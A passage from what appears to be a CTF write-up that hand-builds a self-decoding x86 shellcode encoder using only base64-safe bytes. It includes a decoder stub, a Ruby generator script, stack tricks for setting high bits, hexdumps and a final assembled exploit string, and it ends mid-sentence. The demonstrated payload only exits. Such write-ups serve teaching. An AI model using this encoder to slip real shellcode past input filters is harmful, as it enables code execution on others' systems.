We'll be using that exact pattern a lot - push (value) / pop eax / xor eax, (other value). It's the most fundamental building block of this project!

Setting other registers

Sadly, unless I missed something, there's no easy way to set other registers. We can increment or decrement them, and we can pop values off the stack into some of them, but we don't have the ability to xor, mov, or anything else useful!

There are basically three registers that we have easy access to:

  • 58 pop eax
  • 59 pop ecx
  • 5A pop edx

So to set ecx to an arbitrary value, we can do it via eax:

push 0x41414142
pop eax
xor eax, 0x41414143 ; eax -> 1
push eax
pop ecx ; ecx -> 1

Then verify the base64-ness:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 59           |hBAAAX5CAAAPY|

Unfortunately, if we try the same thing with ebx, we hit a non-base64 character:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 5b           |hBAAAX5CAAAP[|

Note the "[" at the end - that's not in our character set! So we're pretty much limited to using eax, ecx, and edx for most things.

But wait, there's more! We do, however, have access to popad. The popad instruction pops the next 8 dwords off the stack and loads them into the general-purpose registers (the value destined for esp is discarded). It's a bit of a scorched-earth method, though, because it overwrites all the registers at once. We're going to use it at the start of our code to zero out all the registers.

Let's try to convert our exit shellcode from earlier:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Into something that's base-64 friendly:

; We'll start by populating the stack with 0x41414141's
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141

; Then popad to set all the registers to 0x41414141
popad

; Then set eax to 1
push 0x41414142
pop eax
xor eax, 0x41414143

; Finally, do our syscall (as usual, we're going to ignore the fact that the syscall isn't base64 compatible)
int 0x80

Prove that it uses only base64 characters (except the syscall):

$ hexdump -C file
00000000  68 41 41 41 41 68 41 41  41 41 68 41 41 41 41 68  |hAAAAhAAAAhAAAAh|
00000010  41 41 41 41 68 41 41 41  41 68 41 41 41 41 68 41  |AAAAhAAAAhAAAAhA|
00000020  41 41 41 68 41 41 41 41  61 68 42 41 41 41 58 35  |AAAhAAAAahBAAAX5|
00000030  43 41 41 41 cd 80                                 |CAAA..|

And prove that it still works:

$ strace ./run_raw_code ./file
...
read(3, "hAAAAhAAAAhAAAAhAAAAhAAAAhAAAAhA"..., 54) = 54
exit(1094795585)                        = ?

Encoding the actual code

You've probably noticed by now: this is a lot of work. Especially if you want to set each register to a different non-base64-compatible value! You have to encode each value by hand, making sure you set eax last (because it's our working register). And what if you need an instruction (like add, or shift) that isn't available? Do we just simulate it?

As I'm sure you've noticed, the machine code is just a bunch of bytes. What's stopping us from simply encoding the machine code rather than just values?

Let's take our original example of an exit again:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Because 'mov' assembles to 0xb8XXXXXX, I don't want to deal with that yet (the most-significant bit is set). So let's change it a bit to keep each byte (besides the syscall) under 0x80:

00000000  6A01              push byte +0x1
00000002  58                pop eax
00000003  6841414141        push dword 0x41414141
00000008  5B                pop ebx

Or, as a string of bytes:

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b"

Let's pad that to a multiple of 4 so we can encode in 4-byte chunks (we pad with 'A', because it's as good a character as any):

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b\x41\x41\x41"

then break that string into 4-byte chunks, encoding as little endian (reverse byte order):

  • 6a 01 58 68 -> 0x6858016a
  • 41 41 41 41 -> 0x41414141
  • 5b 41 41 41 -> 0x4141415b
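If you'd rather not do that conversion in your head, the same chunking is a one-liner in irb; this little sketch just little-endian-unpacks the padded bytes from above:

code = "\x6a\x01\x58\x68\x41\x41\x41\x41\x5b\x41\x41\x41"
code.unpack('V*').each { |chunk| puts '0x%08x' % chunk }
# 0x6858016a
# 0x41414141
# 0x4141415b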

Then run each of those values through our get_xor_values_32() function from earlier:

irb(main):047:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x6858016a)
0x43614241 ^ 0x2b39432b

irb(main):048:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41414141)
0x6a6a6a6a ^ 0x2b2b2b2b

irb(main):050:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x4141415b)
0x6a6a6a62 ^ 0x2b2b2b39

Let's start our decoder by simply calculating each of these values in eax, just to prove that they're all base64-compatible (note that we are simply discarding the values in this example, we aren't doing anything with them quite yet):

push 0x43614241
pop eax
xor eax, 0x2b39432b ; 0x6858016a

push 0x6a6a6a6a
pop eax
xor eax, 0x2b2b2b2b ; 0x41414141

push 0x6a6a6a62
pop eax
xor eax, 0x2b2b2b39 ; 0x4141415b

Which assembles to:

$ hexdump -Cv file
00000000  68 41 42 61 43 58 35 2b  43 39 2b 68 6a 6a 6a 6a  |hABaCX5+C9+hjjjj|
00000010  58 35 2b 2b 2b 2b 68 62  6a 6a 6a 58 35 39 2b 2b  |X5++++hbjjjX59++|
00000020  2b                                                |+|

Looking good so far!

Decoder stub

Okay, we've proven that we can encode instructions (without the most significant bit set)! Now we actually want to run it!

Basically: our shellcode is going to start with a decoder, followed by a bunch of encoded bytes. We'll also throw some padding in between to make this easier to do by hand. The entire decoder has to be made up of base64-compatible bytes, but the encoded payload (ie, the shellcode) has no restrictions.

So now we actually want to alter the shellcode in memory (self-rewriting code!). We need an instruction to do that, so let's look back at the list of available instructions! After some searching, I found one that's promising:

3151??            xor [ecx+0x??],edx

This command xors the 32-bit value at memory address ecx+0x?? with edx. We know we can easily control ecx (push (value) / pop eax / xor (other value) / push eax / pop ecx) and, similarly edx. Since the "0x??" value has to also be a base64 character, we'll follow our trend and use [ecx+0x41], which gives us:

315141            xor [ecx+0x41],edx

Once I found that command, things started coming together! Since I can control eax, ecx, and edx pretty cleanly, that's basically the perfect instruction to decode our shellcode in-memory!

This is somewhat complex, so let's start by looking at the steps involved:

  • Load the encoded shellcode (half of the xor pair, ie, the return value from get_xor_values_32()) into a known memory address (in our case, it's going to be 0x141 bytes after the start of our code)
  • Set ecx to the value that's 0x41 bytes before that encoded shellcode (0x100)
  • For each 32-bit pair in the encoded shellcode...
    • Load the other half of the xor pair into edx
    • Do the xor to alter it in-memory (ie, decode it back to the original, unencoded value)
    • Increment ecx to point at the next value
    • Repeat for the full payload
  • Run the newly decoded payload

For the sake of our sanity, we're going to make some assumptions in the code: first, our code is loaded to the address 0x41410000 (which it is, for this challenge). Second, the decoder stub is exactly 0x141 bytes long (we will pad it to get there). Either of these can be easily worked around, but it's not necessary to do the extra work in order to grok the decoder concept.

Recall that for our sys_exit shellcode, the xor pairs we determined were: 0x43614241 ^ 0x2b39432b, 0x6a6a6a6a ^ 0x2b2b2b2b, and 0x6a6a6a62 ^ 0x2b2b2b39.

Here's the code:

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; eax -> 0x41410100
push eax
pop ecx ; ecx -> 0x41410100

; Set edx to the first value in the first xor pair
push 0x43614241
pop edx

; xor it with the second value in the first xor pair (which is at ecx + 0x41)
xor [ecx+0x41], edx

; Move ecx to the next 32-bit value
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the second xor pair
push 0x6a6a6a6a
pop edx

; xor + increment ecx again
xor [ecx+0x41], edx
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the third and final xor pair, and xor it
push 0x6a6a6a62
pop edx
xor [ecx+0x41], edx

; At this point, I assembled the code and counted the bytes; we have exactly 0x30 bytes of code so far. That means to get our encoded shellcode to exactly 0x141 bytes after the start, we need 0x111 bytes of padding ('A' translates to inc ecx, so it's effectively a no-op because the encoded shellcode doesn't care what ecx starts as):
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAA'

; Now, the second halves of our xor pairs; this is what gets modified in-place
dd 0x2b39432b
dd 0x2b2b2b2b
dd 0x2b2b2b39

; And finally, we're going to cheat and just do a syscall that's non-base64-compatible
int 0x80

All right! Here's what it gives us; note that other than the syscall at the end (we'll get to that, I promise!), it's all base64:

$ hexdump -Cv file
00000000  68 41 42 6a 6a 58 35 41  43 2b 2b 50 59 68 41 42  |hABjjX5AC++PYhAB|
00000010  61 43 5a 31 51 41 41 41  41 41 68 6a 6a 6a 6a 5a  |aCZ1QAAAAAhjjjjZ|
00000020  31 51 41 41 41 41 41 68  62 6a 6a 6a 5a 31 51 41  |1QAAAAAhbjjjZ1QA|
00000030  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000040  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000050  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000060  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000070  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000080  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000090  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000100  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000110  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000120  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 2b 43 39 2b 2b 2b 2b  2b 39 2b 2b 2b cd 80     |A+C9+++++9+++..|

To run this, we have to patch run_raw_code.c to load the code to the correct address:

diff --git a/forensics/ximage/solution/run_raw_code.c b/forensics/ximage/solution/run_raw_code.c
index 9eadd5e..1ad83f1 100644
--- a/forensics/ximage/solution/run_raw_code.c
+++ b/forensics/ximage/solution/run_raw_code.c
@@ -12,7 +12,7 @@ int main(int argc, char *argv[]){
     exit(0);
   }

-  void * a = mmap(0, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
+  void * a = mmap(0x41410000, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
   printf("allocated %d bytes of executable memory at: %p\n", statbuf.st_size, a);

   FILE *file = fopen(argv[1], "rb");

You'll also have to compile it in 32-bit mode:

$ gcc -m32 -o run_raw_code run_raw_code.c

Once that's done, give 'er a shot:

$ strace ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
[...]
read(3, "hABjjX5AC++PYhABaCZ1QAAAAAhjjjjZ"..., 335) = 335
exit(1094795585)                        = ?

We did it, team!

If we want to actually inspect the code, we can change the very last padding 'A' into 0xcc (aka, int 3, or a SIGTRAP):

$ diff -u file.asm file-trap.asm
--- file.asm    2017-06-11 13:17:57.766651742 -0700
+++ file-trap.asm       2017-06-11 13:17:46.086525100 -0700
@@ -45,7 +45,7 @@
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
-db 'AAAAAAAAAAAAAAAAA'
+db 'AAAAAAAAAAAAAAAA', 0xcc

 ; Now, the second halves of our xor pairs
 dd 0x2b39432b

And run it with corefiles enabled:

$ nasm -o file file.asm
$ ulimit -c unlimited
$ ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
allocated 335 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./core
Core was generated by `/home/ron/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./fi`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410141 in ?? ()
(gdb) x/10i $eip
=> 0x41410141:  push   0x1
   0x41410143:  pop    eax
   0x41410144:  push   0x41414141
   0x41410149:  pop    ebx
   0x4141014a:  inc    ecx
   0x4141014b:  inc    ecx
   0x4141014c:  inc    ecx
   0x4141014d:  int    0x80
   0x4141014f:  add    BYTE PTR [eax],al
   0x41410151:  add    BYTE PTR [eax],al

As you can see, our original shellcode is properly decoded! (The inc ecx instructions you're seeing are our padding.)

The decoder stub and encoded shellcode can be quite easily generated programmatically rather than doing it by hand, which is extremely error prone (it took me 4 tries to get it right - I messed up the start address, I compiled run_raw_code in 64-bit mode, and I got the endianness backwards before I finally got it right, which doesn't sound so bad, except that I had to go back and re-write part of this section and re-run most of the commands to get the proper output each time :) ).
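For what it's worth, here's a rough sketch of what such a generator could look like. It's not the code from my actual tool, it ignores the MSB case we're about to discuss, and it hard-codes the same 0x41410000 base address and 0x141 data offset we've been assuming all along; it simply re-implements the find_bytes() idea from earlier and emits nasm source:

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      return [b1, b2] if (b1 ^ b2) == b
    end
  end
  raise("Can't encode 0x%02x (MSB set)" % b)
end

def encode(shellcode)
  shellcode = shellcode + ('A' * (-shellcode.length % 4))   # pad to a multiple of 4 bytes
  pairs = shellcode.unpack('V*').map do |chunk|
    xors = [chunk].pack('V').bytes.map { |b| find_bytes(b) }
    [
      xors.map { |x| x[0] }.pack('C4').unpack('V')[0],  # half that gets pushed in-line
      xors.map { |x| x[1] }.pack('C4').unpack('V')[0],  # half that lives after the padding
    ]
  end

  asm = "bits 32\n"
  # Prologue: ecx = 0x41410100 (0x41 bytes before the encoded data at 0x41410141)
  asm << "push 0x6a6a4241\npop eax\nxor eax, 0x2b2b4341\npush eax\npop ecx\n"
  stub_len = 13
  pairs.each_with_index do |(inline, _), i|
    asm << ("push 0x%08x\npop edx\nxor [ecx+0x41], edx\n" % inline)
    stub_len += 9
    unless i == pairs.length - 1
      asm << ("inc ecx\n" * 4)   # step to the next 32-bit value
      stub_len += 4
    end
  end
  asm << "db '#{'A' * (0x141 - stub_len)}'\n"   # no-op padding out to offset 0x141
  pairs.each { |_, enc| asm << ("dd 0x%08x\n" % enc) }
  asm << "int 0x80\n"   # still cheating on the syscall itself
  asm
end

# The MSB-free version of the exit shellcode from earlier
puts encode("\x6a\x01\x58\x68\x41\x41\x41\x41\x5b")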

That pesky most-significant-bit

So, I've been avoiding this, because I don't think I solved it in a very elegant way. But, my solution works, so I guess that's something. :)

As usual, we start by looking at our set of available instructions to see what we can use to set the most significant bit (let's start calling it the "MSB" to save my fingers).

Unfortunately, the easy stuff can't help us; xor can only set it if it's already set somewhere, we don't have any shift instructions, inc would take forever, and the subtract and multiply instructions could probably work, but it would be tricky.

Let's start with a simple case: can we set edx to 0x80?

First, let's set edx to the highest value we can, 0x7F (we choose edx because a) it's one of the three registers we can easily pop into; b) eax is our working variable since it's the only one we can xor; and c) we don't want to change ecx once we start going, since it points to the memory we're decoding):

irb(main):057:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x0000007F)
0x41414146 ^ 0x41414139

Using those values and our old push / pop / xor pattern, we can set edx to 0x80:

push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F

; Now that edx is 0x7F, we can simply increment it
inc edx ; edx -> 0x80

That works out to:

00000000  68 46 41 41 41 58 35 39  41 41 41 50 5a 42        |hFAAAX59AAAPZB|

So far so good! Now we can do our usual xor to set that one bit in our decoded code:

xor [ecx+0x41], edx

This sets the MSB of the lowest byte of whatever is at ecx+0x41 (the dword we're currently decoding).

If we were decoding a single bit at a time, we'd be done. Unfortunately, we aren't so lucky - we're working in 32-bit (4-byte) chunks.

Setting edx to 0x00008000, 0x00800000, or 0x80000000

So how do we set edx to 0x00008000, 0x00800000, or 0x80000000 without having a shift instruction?

This is where I introduce a pretty ugly hack. In effect, we use some stack shenanigans to perform a poor-man's shift. This won't work on most non-x86/x64 systems, because they require a word-aligned stack (I was actually a little surprised it worked on x86, to be honest!).

Let's say we want 0x00008000. Let's just look at the code:

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier (we need a register that's reliably 0)
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set edx to 0x00000080, just like before
push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F
inc edx ; edx -> 0x80

; Push edi (which, like all registers, is 0) onto the stack
push edi ; 0x00000000

; Push edx onto the stack
push edx

; Move esp by 1 byte - note that this won't work on many architectures, but x86/x64 are fine with a misaligned stack
dec esp

; Get edx back, shifted by one byte
pop edx

; Fix the stack (not really necessary, but it's nice to do it)
inc esp

; Add a debug breakpoint so we can inspect the value
int 3

And we can use gdb to prove it works with the same trick as before:

$ nasm -o file file.asm
$ rm -f core
$ ulimit -c unlimited
$ ./run_raw_code ./file
allocated 41 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410029 in ?? ()
(gdb) print/x $edx
$1 = 0x8000

We can do basically the exact same thing to set the third byte:

push edi ; 0x00000000
push edx
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp ; <-- New

And the fourth:

push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp
inc esp ; <-- New

Putting it all together

You can take a look at how I do this in my final code. It's going to be a little different, because instead of using our xor trick to set edx to 0x7F, I instead push 0x7a / pop edx / increment 6 times. The only reason is that I didn't think of the xor trick when I was writing the original code, and I don't want to mess with it now.

But, we're going to do it the hard way: by hand! I'm literally writing this code as I write the blog (and, message from the future: it worked on the second try :) ).

Let's just stick with our simple exit-with-0x41414141-status shellcode:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Which assembles to this, which is conveniently already a multiple of 4 bytes so no padding required:

00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |......AAAA..|

Since we're doing it by hand, let's extract all the MSBs into a separate string (remember, this is all done programmatically usually):

00000000  38 01 00 00 00 3b 41 41  41 41 4d 00              |8....;AAAAM.|
00000000  80 00 00 00 00 80 00 00  00 00 80 80              |............|

If you xor those two strings together, you'll get the original string back.
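Doing that split programmatically is just a couple of map calls: keep the low seven bits of each byte in one string and the top bit in the other. A quick sketch (xoring the two results back together gives the original bytes):

shellcode = "\xb8\x01\x00\x00\x00\xbb\x41\x41\x41\x41\xcd\x80"
low_bits = shellcode.bytes.map { |b| b & 0x7f }.pack('C*')   # MSB-free version
msb_bits = shellcode.bytes.map { |b| b & 0x80 }.pack('C*')   # just the MSBs

puts low_bits.unpack('H*')[0]   # 38010000003b414141414d00
puts msb_bits.unpack('H*')[0]   # 800000000080000000008080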

First, let's worry about the first string. It's handled exactly the way we did the last example. We start by getting the three 32-bit values as little endian values:

  • 38 01 00 00 -> 0x00000138
  • 00 3b 41 41 -> 0x41413b00
  • 41 41 4d 00 -> 0x004d4141

And then find the xor pairs to generate them just like before:

irb(main):061:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x00000138)
0x41414241 ^ 0x41414379

irb(main):062:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41413b00)
0x6a6a4141 ^ 0x2b2b7a41

irb(main):063:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x004d4141)
0x41626a6a ^ 0x412f2b2b

But here's where the twist comes: let's take the MSB string above, and also convert that to little-endian integers:

  • 80 00 00 00 -> 0x00000080
  • 00 80 00 00 -> 0x00008000
  • 00 00 80 80 -> 0x80800000

Now, let's try writing our decoder stub just like before, except that after decoding the MSB-free value, we're going to separately inject the MSBs into the code!

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; 0x41410100
push eax
pop ecx

; xor the first pair
push 0x41414241
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00000080, so let's load it into edx
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the second pair
push 0x6a6a4141
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00008000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080

push edi ; 0x00000000
push edx
dec esp
pop edx ; edx is now 0x00008000
inc esp
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the third pair
push 0x41626a6a
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x80800000; we'll do it in two operations, with 0x00800000 first
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
xor [ecx+0x41], edx

; And then the 0x80000000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp
pop edx ; edx is now 0x80000000
inc esp
inc esp
inc esp
xor [ecx+0x41], edx

; Padding (calculated based on the length above, subtracted from 0x141)
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAA'

; The second halves of the pairs (ie, the encoded data; this is where the decoded data will end up by the time execution gets here)
dd 0x41414379
dd 0x2b2b7a41
dd 0x412f2b2b

And that's it! Let's try it out! The code leading up to the padding assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41 50 50 50 50 50  |hAAAAX5AAAAPPPPP|
00000010  50 50 50 61 68 41 42 6a  6a 58 35 41 43 2b 2b 50  |PPPahABjjX5AC++P|
00000020  59 68 41 42 41 41 5a 31  51 41 68 46 41 41 41 58  |YhABAAZ1QAhFAAAX|
00000030  35 39 41 41 41 50 5a 42  31 51 41 41 41 41 41 68  |59AAAPZB1QAAAAAh|
00000040  41 41 6a 6a 5a 31 51 41  68 46 41 41 41 58 35 39  |AAjjZ1QAhFAAAX59|
00000050  41 41 41 50 5a 42 57 52  4c 5a 44 31 51 41 41 41  |AAAPZBWRLZD1QAAA|
00000060  41 41 68 6a 6a 62 41 5a  31 51 41 68 46 41 41 41  |AAhjjbAZ1QAhFAAA|
00000070  58 35 39 41 41 41 50 5a  42 57 52 4c 4c 5a 44 44  |X59AAAPZBWRLLZDD|
00000080  31 51 41 68 46 41 41 41  58 35 39 41 41 41 50 5a  |1QAhFAAAX59AAAPZ|
00000090  42 57 52 4c 4c 4c 5a 44  44 44 31 51 41           |BWRLLLZDDD1QA|

We can verify it's all base64 by eyeballing it. We can also determine that it's 0x9d bytes long, which means to get to 0x141 we need to pad it with 0xa4 bytes (already included above) before the encoded data.
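Eyeballing works, but a couple of lines of Ruby can double-check it and do the padding arithmetic for us. This is just a convenience sketch, and it assumes you've assembled only the stub (everything before the padding) into a file called stub.bin:

safe = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'.bytes
stub = File.binread('stub.bin')
bad  = stub.bytes.reject { |b| safe.include?(b) }
puts(bad.empty? ? 'all base64-safe!' : 'offending bytes: ' + bad.map { |b| '%02x' % b }.join(' '))
puts('padding needed to reach 0x141: 0x%x' % (0x141 - stub.length))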

We can dump allll that code into a file, and run it with run_raw_code (don't forget to apply the patch from earlier to change the base address to 0x41410000, and don't forget to compile with -m32 for 32-bit mode):

$ nasm -o file file.asm
$ strace ./run_raw_code ./file
read(3, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 333) = 333
exit(1094795585)                        = ?
+++ exited with 65 +++

It works! And it only took me two tries (I missed the 'inc ecx' lines the first time :) ).

I realize that it's a bit inefficient to encode 3 lines into like 100, but that's the cost of having a limited character set!

Solving the level

Bringing it back to the actual challenge...

Now that we have working base64 code, the rest is pretty simple. Since the app encodes the base64 for us, we have to take what we have and decode it first, to get the string that would generate the base64 we want.

Because base64 works in blocks and has padding, we're going to append a few meaningless bytes to the end, so that if anything gets mangled by falling into a partial block, it's those throwaway bytes that get mangled rather than our code.

Here's the full "exploit", assembled:

hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/A

We're going to add a few 'A's to the end for padding (the character we choose is meaningless), and run it through base64 -d (adding '='s to the end until we stop getting decoding errors):

$ echo 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | hexdump -Cv
00000000  84 00 00 01 7e 40 00 00  0f 3c f3 cf 3c f3 da 84  |....~@...<..<...|
00000010  00 63 8d 7e 40 0b ef 8f  62 10 01 00 06 75 40 08  |.c.~@...b....u@.|
00000020  45 00 00 17 e7 d0 00 00  f6 41 d5 00 00 00 00 21  |E........A.....!|
00000030  00 08 e3 67 54 00 84 50  00 01 7e 7d 00 00 0f 64  |...gT..P..~}...d|
00000040  15 91 2d 90 f5 40 00 00  00 08 63 8d b0 19 d5 00  |..-..@....c.....|
00000050  21 14 00 00 5f 9f 40 00  03 d9 05 64 4b 2d 90 c3  |!..._.@....dK-..|
00000060  d5 00 21 14 00 00 5f 9f  40 00 03 d9 05 64 4b 2c  |..!..._.@....dK,|
00000070  b6 43 0c 3d 50 00 00 00  00 00 00 00 00 00 00 00  |.C.=P...........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  03 20 80 00 0c fe fb ef  bf 00 00 00 00 00        |. ............|

Let's convert that into a string that we can use on the commandline by chaining together a bunch of shell commands:

